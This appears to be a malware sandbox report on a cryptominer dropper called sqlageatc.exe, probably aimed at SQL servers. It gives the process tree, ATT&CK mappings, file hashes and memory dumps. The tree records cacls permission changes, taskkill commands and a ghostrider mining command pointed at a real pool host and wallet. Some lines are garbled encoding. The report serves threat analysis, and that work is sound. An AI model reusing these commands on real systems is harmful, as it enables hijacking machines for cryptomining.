cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:3912

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:5872

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
3⤵
PID:5156

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:2324

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:5552

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:3376

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
3⤵
PID:5520

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:5928

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:3840

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:1044

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:2104

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f
2⤵
PID:4152

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f
3⤵
PID:2236

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:3084

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:4292

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:4628

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im cacls.exe
2⤵
PID:3140

C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\sqlageatc.exe -a ghostrider --donate-level 1 --max-cpu-usage 75 --url s.ooooooooooo.top:11433 --tls --user 14QUg7ycnWmVqfcmvuwYofsoTX4d2FuPk2.1114c -p x -k >C:\Users\Admin\AppData\Local\Temp\CPU_log.txt
2⤵
PID:4480

C:\Users\Admin\AppData\Local\Temp\sqlageatc.exe
C:\Users\Admin\AppData\Local\Temp\sqlageatc.exe -a ghostrider --donate-level 1 --max-cpu-usage 75 --url s.ooooooooooo.top:11433 --tls --user 14QUg7ycnWmVqfcmvuwYofsoTX4d2FuPk2.1114c -p x -k
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:1432

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f
2⤵
PID:5504

C:\Windows\SysWOW64\cacls.exe
cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f
3⤵
PID:4144

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f
2⤵
PID:3228

C:\Windows\SysWOW64\cacls.exe
cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f
3⤵
PID:3116

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f
2⤵
PID:4860

C:\Windows\SysWOW64\cacls.exe
cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f
3⤵
PID:5580

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f
2⤵
PID:5052

C:\Windows\SysWOW64\cacls.exe
cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f
3⤵
PID:4260

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:4008

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:5932

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im cmd.exe
2⤵
PID:3012

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im cmd.exe
3⤵
- Kills process with taskkill
PID:3596

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f
2⤵
PID:4872

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f
3⤵
PID:5248

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:5256

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:4988

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f
2⤵
PID:5136

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f
3⤵
PID:1132

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:3428

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:4500

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:224

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
3⤵
PID:3288

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:4920

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:3444

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:5288

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
3⤵
PID:1980

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:4832

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:3856

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f
3⤵
PID:3604

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:5320

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:4488

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f
2⤵
PID:5152

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f
3⤵
PID:4032

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:5260

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:5880

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:4740

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
3⤵
PID:32

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im cacls.exe
2⤵
PID:4424

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im cacls.exe
3⤵
PID:4688

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
1⤵
PID:2012

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f
1⤵
PID:5732

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

1

T1562

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\TempUpdate2.bat
Filesize
32KB

MD5
ec3fa33874b842d0a549688a2ca7723a

SHA1
7cd48ada26369a3d100ee526717571c5b5b86566

SHA256
64a049cf96b48bf4d48945530e2cd4a150d8aac45617cedf986466983169f8aa

SHA512
260bf2d6ede6a990c187ff9f6cb768bcadb4be5a1d6676ce3cf318638e4edf251446e061d83d65ab8cfe847301da837c8e880a19383cfb4b5bf06c5a9fa28d61

Download Submit
C:\Users\Admin\AppData\Local\Temp\sqlageatc.exe
Filesize
7.8MB

MD5
9aff07d0416aef82dfa3b31d3518f27d

SHA1
9ab6f267ab321350d0f5435342abb6cd496e7d23

SHA256
d90d67ca00b1bb32159d404be012f8c32197e367a88974df592cd975ec1fb706

SHA512
f3eda82e8f9471a93a73b8817bc997ba2f1c6126894051066db47b5503036f594c82973504b908c9abac09e881b2421aca6aa51ada4e7891d966e1dba33d57b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\sqlageatc.exe
Filesize
7.8MB

MD5
9aff07d0416aef82dfa3b31d3518f27d

SHA1
9ab6f267ab321350d0f5435342abb6cd496e7d23

SHA256
d90d67ca00b1bb32159d404be012f8c32197e367a88974df592cd975ec1fb706

SHA512
f3eda82e8f9471a93a73b8817bc997ba2f1c6126894051066db47b5503036f594c82973504b908c9abac09e881b2421aca6aa51ada4e7891d966e1dba33d57b2

Download Submit
memory/112-143-0x0000000000000000-mapping.dmp

Download
memory/308-142-0x0000000000000000-mapping.dmp

Download
memory/528-149-0x0000000000000000-mapping.dmp

Download
memory/552-199-0x0000000000400000-0x0000000000561000-memory.dmp

Filesize
1.4MB

Download
memory/552-133-0x0000000002390000-0x000000000239B000-memory.dmp

Filesize
44KB

Download
memory/552-134-0x0000000002390000-0x000000000239B000-memory.dmp

Filesize
44KB

Download
memory/552-132-0x0000000000400000-0x0000000000561000-memory.dmp

Filesize
1.4MB

Download
memory/872-174-0x0000000000000000-mapping.dmp

Download
memory/952-161-0x0000000000000000-mapping.dmp

Download
memory/1100-137-0x0000000000000000-mapping.dmp

Download
memory/1100-198-0x0000000000000000-mapping.dmp

Download
memory/1432-167-0x0000000000000000-mapping.dmp

Download
memory/1432-203-0x0000017DEAC60000-0x0000017DEAC80000-memory.dmp

Filesize
128KB

Download
memory/1476-188-0x0000000000000000-mapping.dmp

Download
memory/1564-140-0x0000000000000000-mapping.dmp

Download
memory/1636-155-0x0000000000000000-mapping.dmp

Download
memory/1656-170-0x0000000000000000-mapping.dmp

Download
memory/1712-169-0x0000000000000000-mapping.dmp

Download
memory/1856-182-0x0000000000000000-mapping.dmp

Download
memory/1856-147-0x0000000000000000-mapping.dmp

Download
memory/2108-138-0x0000000000000000-mapping.dmp

Download
memory/2208-171-0x0000000000000000-mapping.dmp

Download
memory/2324-196-0x0000000000000000-mapping.dmp

Download
memory/2336-156-0x0000000000000000-mapping.dmp

Download
memory/2368-151-0x0000000000000000-mapping.dmp

Download
memory/2532-158-0x0000000000000000-mapping.dmp

Download
memory/2540-192-0x0000000000000000-mapping.dmp

Download
memory/2636-168-0x0000000000000000-mapping.dmp

Download
memory/2756-189-0x0000000000000000-mapping.dmp

Download
memory/2836-193-0x0000000000000000-mapping.dmp

Download
memory/2868-179-0x0000000000000000-mapping.dmp

Download
memory/3000-152-0x0000000000000000-mapping.dmp

Download
memory/3068-177-0x0000000000000000-mapping.dmp

Download
memory/3116-145-0x0000000000000000-mapping.dmp

Download
memory/3220-175-0x0000000000000000-mapping.dmp

Download
memory/3264-154-0x0000000000000000-mapping.dmp

Download
memory/3336-159-0x0000000000000000-mapping.dmp

Download
memory/3376-178-0x0000000000000000-mapping.dmp

Download
memory/3404-191-0x0000000000000000-mapping.dmp

Download
memory/3428-163-0x0000000000000000-mapping.dmp

Download
memory/3496-141-0x0000000000000000-mapping.dmp

Download
memory/3532-173-0x0000000000000000-mapping.dmp

Download
memory/3552-144-0x0000000000000000-mapping.dmp

Download
memory/3552-176-0x0000000000000000-mapping.dmp

Download
memory/3592-136-0x0000000000000000-mapping.dmp

Download
memory/3620-190-0x0000000000000000-mapping.dmp

Download
memory/3624-186-0x0000000000000000-mapping.dmp

Download
memory/3628-146-0x0000000000000000-mapping.dmp

Download
memory/3636-153-0x0000000000000000-mapping.dmp

Download
memory/3824-197-0x0000000000000000-mapping.dmp

Download
memory/3868-180-0x0000000000000000-mapping.dmp

Download
memory/3936-165-0x0000000000000000-mapping.dmp

Download
memory/4020-195-0x0000000000000000-mapping.dmp

Download
memory/4044-157-0x0000000000000000-mapping.dmp

Download
memory/4064-184-0x0000000000000000-mapping.dmp

Download
memory/4116-185-0x0000000000000000-mapping.dmp

Download
memory/4140-139-0x0000000000000000-mapping.dmp

Download
memory/4228-172-0x0000000000000000-mapping.dmp

Download
memory/4244-160-0x0000000000000000-mapping.dmp

Download
memory/4260-164-0x0000000000000000-mapping.dmp

Download
memory/4264-187-0x0000000000000000-mapping.dmp

Download
memory/4332-135-0x0000000000000000-mapping.dmp

Download
memory/4532-194-0x0000000000000000-mapping.dmp

Download
memory/4700-162-0x0000000000000000-mapping.dmp

Download
memory/4780-181-0x0000000000000000-mapping.dmp

Download
memory/4860-148-0x0000000000000000-mapping.dmp

Download
memory/4864-183-0x0000000000000000-mapping.dmp

Download
memory/5020-150-0x0000000000000000-mapping.dmp

Download
memory/5040-166-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads